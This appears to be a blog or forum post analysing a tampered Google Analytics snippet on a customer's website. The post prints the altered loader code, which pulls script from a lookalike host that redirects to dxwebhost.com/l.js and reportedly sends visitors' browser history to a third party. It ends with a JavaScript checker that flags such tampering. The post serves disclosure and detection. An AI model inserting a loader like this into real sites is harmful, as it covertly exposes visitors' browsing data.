I found this on a customer site (for example, customersite.com). Looks like Google Analytics tracking code, right?
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://customersite.com" : "http://www.customersite.com");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
var test = unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E");
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-xxxxxx-x");
pageTracker._trackPageview();
} catch(err) {}</script>
Somehow my customer had been tricked into changing:
"https://" : "http://"
to:
"https://customersite.com" : "http://www.customersite.com"
This makes the JavaScript load from http://www.customersite.comgoogle-analytics.com, which then redirects to dxwebhost.com/l.js for the JavaScript. It looks like the JavaScript file then uses a CSS vulnerability to look up the user's browser history and asynchronously send it off to the third-party site.
So if you happen to be looking at your network traffic and notice your browser history is being sent off to a strange site, check out the Google Analytics tracking code.
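One way to check a page for this kind of tampering, as an added example that is not part of the original post: it rebuilds the script URL from the loader's two prefixes and verifies the resulting host. The names `auditGaLoader` and `isTrustedHost` and the regexes are assumptions made for this sketch; the sample input is the loader quoted above.

```javascript
// Added example: flags a ga.js loader whose rebuilt script URL leaves google-analytics.com.
const TRUSTED = "google-analytics.com";

// Trusted only if it is the domain itself or a dot-separated subdomain.
// A bare endsWith(TRUSTED) would accept "customersite.comgoogle-analytics.com".
function isTrustedHost(hostname) {
  const h = hostname.toLowerCase();
  return h === TRUSTED || h.endsWith("." + TRUSTED);
}

// Pull both protocol prefixes and the path suffix out of the loader source,
// rebuild the URLs the browser would request, and classify each host.
function auditGaLoader(source) {
  const prefixRe = /gaJsHost\s*=\s*\(\(.*?\)\s*\?\s*"([^"]*)"\s*:\s*"([^"]*)"\s*\)/;
  const suffixRe = /gaJsHost\s*\+\s*"([^"']*)'/;
  const p = prefixRe.exec(source);
  const s = suffixRe.exec(source);
  if (!p || !s) return { found: false, findings: [] };
  const findings = [p[1], p[2]].map((prefix) => {
    const url = prefix + s[1];
    let host = null;
    try { host = new URL(url).hostname; } catch (e) { /* not a valid URL */ }
    return { url, host, trusted: host !== null && isTrustedHost(host) };
  });
  return { found: true, findings };
}

// Loader lines as quoted in the post (tampered prefixes).
const TAMPERED = `
var gaJsHost = (("https:" == document.location.protocol) ? "https://customersite.com" : "http://www.customersite.com");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
`;
// Same lines with the prefixes the post gives as the original values.
const ORIGINAL = TAMPERED
  .replace('"https://customersite.com"', '"https://"')
  .replace('"http://www.customersite.com"', '"http://"');

for (const [name, src] of [["tampered", TAMPERED], ["original", ORIGINAL]]) {
  for (const f of auditGaLoader(src).findings) {
    console.log(name, f.trusted ? "OK  " : "FLAG", f.url);
  }
}
```

The dot-boundary comparison matters here because the tampered host still ends with the string `google-analytics.com`, so a plain suffix match would pass it.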